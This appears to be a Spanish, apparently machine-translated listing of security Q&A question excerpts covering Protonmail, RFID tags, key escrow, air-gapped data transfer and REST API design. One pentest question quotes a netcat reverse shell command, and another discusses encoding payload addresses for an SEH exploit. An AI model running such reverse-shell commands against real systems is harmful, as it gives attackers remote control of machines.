Todas las preguntas

1
respuesta

Envolviendo mi cabeza alrededor de Protonmail

He estado tratando de comprender cómo podría funcionar Protonmail. De lo que recopila, funciona así: Cuando te registras, creas una contraseña de cuenta y una contraseña de buzón. Un par de claves privadas / públicas de PGP se realiza medi...
pregunta 02.11.2014 - 13:22
2
respuestas

Respuesta apropiada a la violación de seguridad de Rusia 2014 (CyberVor)

El informe de Hold Security dice que 1,2 mil millones de conjuntos de credenciales están en posesión de esta parte. Tengo la sensación de que este informe puede ser un engaño o un engaño parcial debido a errores gramaticales ("mientras prepara...
pregunta 06.08.2014 - 06:39
1
respuesta

Diferencias de seguridad entre las etiquetas RFID pasivas y activas

La mayoría de las personas son conscientes de que hay dos tipos de etiquetas RFID, etiquetas activas (las que contienen algún tipo de fuente de alimentación) y etiquetas pasivas (las que funcionan con el campo RF). ¿Me gustaría saber si elegi...
pregunta 17.05.2013 - 00:36
2
respuestas

¿Debo encriptar un certificado usado solo para la automatización?

Tengo un archivo PEM utilizado solo para compilaciones y pruebas automáticas en Amazon. Mi proyecto es de código abierto y mantengo toda la información en github. Si la información es confidencial, la cifro y aún la guardo en github. ¿Debo...
pregunta 23.11.2014 - 20:20
2
respuestas

¿Ha habido algún caso documentado en el que piratas informáticos hayan secuestrado el número de teléfono de una empresa?

¿Ha habido casos en los que los piratas informáticos hayan tomado el número de teléfono de una empresa al crear un número de teléfono en el mismo código de área, configurar un sistema virtual de PBX / Asterisk, enrutar todas las llamadas a la em...
pregunta 23.01.2014 - 19:16
1
respuesta

¿Cuál es la diferencia entre Key Escrow y un Agente de recuperación?

Por lo que entiendo, el depósito de claves es donde una copia de la clave se almacena en un lugar seguro para que pueda recuperarse más tarde. Pero en el contexto de PKI, un Agente de recuperación también puede recuperar claves privadas. ¿...
pregunta 17.05.2013 - 12:52
2
respuestas

Pentest: manejo de múltiples shells inversos

Estoy ejecutando un Pentest y estoy esperando shells inversos de múltiples shells que se conectan de nuevo como: - nc <my-ip> <my-port> -e /bin/bash Sin embargo, estoy tratando de descubrir la mejor manera de administrar estas c...
pregunta 07.12.2013 - 13:52
2
respuestas

Codificación de una dirección que contiene un byte nulo en una carga útil

Estoy trabajando en un exploit SEH. El problema al que me enfrento aquí es que todas las direcciones POP / POP / RETN terminan con bytes nulos, por lo que todo lo que se coloca después de que se corrompe. ¿Es posible usar Metasploit Msfencode...
pregunta 03.08.2013 - 14:56
3
respuestas

¿Cómo puedo mover de forma segura y conveniente llaves, certificados y otros datos breves a través de un espacio de aire?

¿Qué opciones están disponibles para transferir datos entre máquinas Unix separadas por un espacio de aire? unidades flash USB Medios ópticos, por ejemplo, CD y DVD Papel impreso y escaneado + OCR Software de código QR, pantallas o imp...
pregunta 26.08.2014 - 21:49
2
respuestas

Problemas de seguridad de la API REST sin token

Estoy diseñando una API en PHP / MySQL que, por su diseño, no almacenará la contraseña de un usuario en la base de datos y, por lo tanto, no genera tokens de autorización para que el cliente los tenga. La razón de esto es para evitar cualquier p...
pregunta 16.10.2013 - 22:47